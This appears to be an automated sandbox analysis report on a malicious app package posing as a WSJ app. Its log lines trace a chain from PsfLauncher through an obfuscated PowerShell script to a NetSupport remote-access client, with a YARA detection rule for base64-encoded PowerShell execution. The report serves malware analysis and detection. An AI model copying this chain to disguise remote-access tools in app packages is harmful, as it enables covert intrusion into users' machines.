                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FBEAD25_2_00007FF9BB3FBEAD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB404E5B25_2_00007FF9BB404E5B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40DE9025_2_00007FF9BB40DE90
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40552D25_2_00007FF9BB40552D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40A54D25_2_00007FF9BB40A54D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4074FD25_2_00007FF9BB4074FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40C4FD25_2_00007FF9BB40C4FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40CD0025_2_00007FF9BB40CD00
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB402DA625_2_00007FF9BB402DA6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4045BD25_2_00007FF9BB4045BD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40B58D25_2_00007FF9BB40B58D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40657B25_2_00007FF9BB40657B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB5754CD25_2_00007FF9BB5754CD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BBA11E4E25_2_00007FF9BBA11E4E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BBB8955A25_2_00007FF9BBB8955A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BBB81BEA25_2_00007FF9BBB81BEA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BBB801C825_2_00007FF9BBB801C8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BBB8956325_2_00007FF9BBB89563
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BBB8656F25_2_00007FF9BBB8656F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F983125_2_00007FF9BB3F9831
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4121826_2_00007FF9BAF41218
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4324A26_2_00007FF9BAF4324A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4D27826_2_00007FF9BAF4D278
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF627E026_2_00007FF9BAF627E0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF40FE026_2_00007FF9BAF40FE0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF6601826_2_00007FF9BAF66018
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF41F1826_2_00007FF9BAF41F18
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4EF5026_2_00007FF9BAF4EF50
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4663826_2_00007FF9BAF46638
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF456AA26_2_00007FF9BAF456AA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF48BAD26_2_00007FF9BAF48BAD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF5829226_2_00007FF9BAF58292
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4190526_2_00007FF9BAF41905
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF4103026_2_00007FF9BAF41030
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF418D626_2_00007FF9BAF418D6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF41F7026_2_00007FF9BAF41F70
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BAF5868826_2_00007FF9BAF58688
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB1A41C126_2_00007FF9BB1A41C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB1A47C826_2_00007FF9BB1A47C8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB35561D26_2_00007FF9BB35561D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CDC1A26_2_00007FF9BB3CDC1A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E642D26_2_00007FF9BB3E642D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F042D26_2_00007FF9BB3F042D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D63FF26_2_00007FF9BB3D63FF
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E7BFA26_2_00007FF9BB3E7BFA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D540C26_2_00007FF9BB3D540C
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D44A526_2_00007FF9BB3D44A5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CBC9E26_2_00007FF9BB3CBC9E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EFC9D26_2_00007FF9BB3EFC9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C8CA926_2_00007FF9BB3C8CA9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CECD326_2_00007FF9BB3CECD3
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DD47226_2_00007FF9BB3DD472
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E548726_2_00007FF9BB3E5487
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C748726_2_00007FF9BB3C7487
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C1C7B26_2_00007FF9BB3C1C7B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C5B2826_2_00007FF9BB3C5B28
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C4B1B26_2_00007FF9BB3C4B1B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F2B1D26_2_00007FF9BB3F2B1D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C631E26_2_00007FF9BB3C631E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F4B4126_2_00007FF9BB3F4B41
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D734E26_2_00007FF9BB3D734E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F32DD26_2_00007FF9BB3F32DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E7ADB26_2_00007FF9BB3E7ADB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CD2F626_2_00007FF9BB3CD2F6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E12F026_2_00007FF9BB3E12F0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E5B0226_2_00007FF9BB3E5B02
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DDAFA26_2_00007FF9BB3DDAFA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F239D26_2_00007FF9BB3F239D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EDBC126_2_00007FF9BB3EDBC1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D5BD526_2_00007FF9BB3D5BD5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D836126_2_00007FF9BB3D8361
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DCB7526_2_00007FF9BB3DCB75
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CAB6926_2_00007FF9BB3CAB69
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E536B26_2_00007FF9BB3E536B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C838426_2_00007FF9BB3C8384
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EAB7D26_2_00007FF9BB3EAB7D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E6B9526_2_00007FF9BB3E6B95
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C122726_2_00007FF9BB3C1227
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EFA1D26_2_00007FF9BB3EFA1D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F021D26_2_00007FF9BB3F021D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F09DD26_2_00007FF9BB3F09DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F11DD26_2_00007FF9BB3F11DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C41D926_2_00007FF9BB3C41D9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CA1EC26_2_00007FF9BB3CA1EC
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CDA0626_2_00007FF9BB3CDA06
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D521726_2_00007FF9BB3D5217
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DE2A526_2_00007FF9BB3DE2A5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EE2A826_2_00007FF9BB3EE2A8
                                    Source: amsi64_7788.amsi.csv, type: OTHER, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                    Source: Process Memory Space: powershell.exe PID: 2564, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                    Source: Process Memory Space: powershell.exe PID: 7788, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                    Source: classification engine, Classification label: mal100.rans.evad.win@48/139@21/11
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_11059290 GetLastError,FormatMessageA,LocalFree
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_1109C580 AdjustTokenPrivileges,FindCloseChangeNotification
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_1109C4F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_11095A00 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_110CC3D0 IsWindow,IsWindowVisible,SetForegroundWindow,FindResourceExA,LoadResource,LockResource,DialogBoxIndirectParamA,DialogBoxParamA
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_11124DC0 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
                                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2736:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_03
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe, File created: C:\Users\user\AppData\Local\Packages\microsoft.desktopappinstaller_8wekyb3d8bbwe\AC\Temp\APPX.h150xbbh9hh9t9qrahcglr31d.tmp
                                    Source: C:\ProgramData\netsupport\client\client32.exe, File read: C:\ProgramData\netsupport\client\client32.ini
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: unknown, Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://wsj.pm/
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2012,i,2892533121597599651,11552435548397906284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                    Source: unknown, Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
                                    Source: unknown, Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy
                                    Source: unknown, Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe"
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=404 --field-trial-handle=1996,i,16757572502617297566,4553058767684910018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\netsupport\client\client32.exe "C:\ProgramData\netsupport\client\client32.exe"
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msvcp140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: concrt140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.xaml.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dcomp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rometadata.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windowmanagementapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: inputhost.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dxgi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.applicationmodel.background.systemeventsbroker.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: biwinrt.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: mrmcorer.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: d3d11.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: d3d10warp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dxcore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: d2d1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: bcp47mrm.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msvcp140_app.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_1_app.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_app.dllJump to behavior
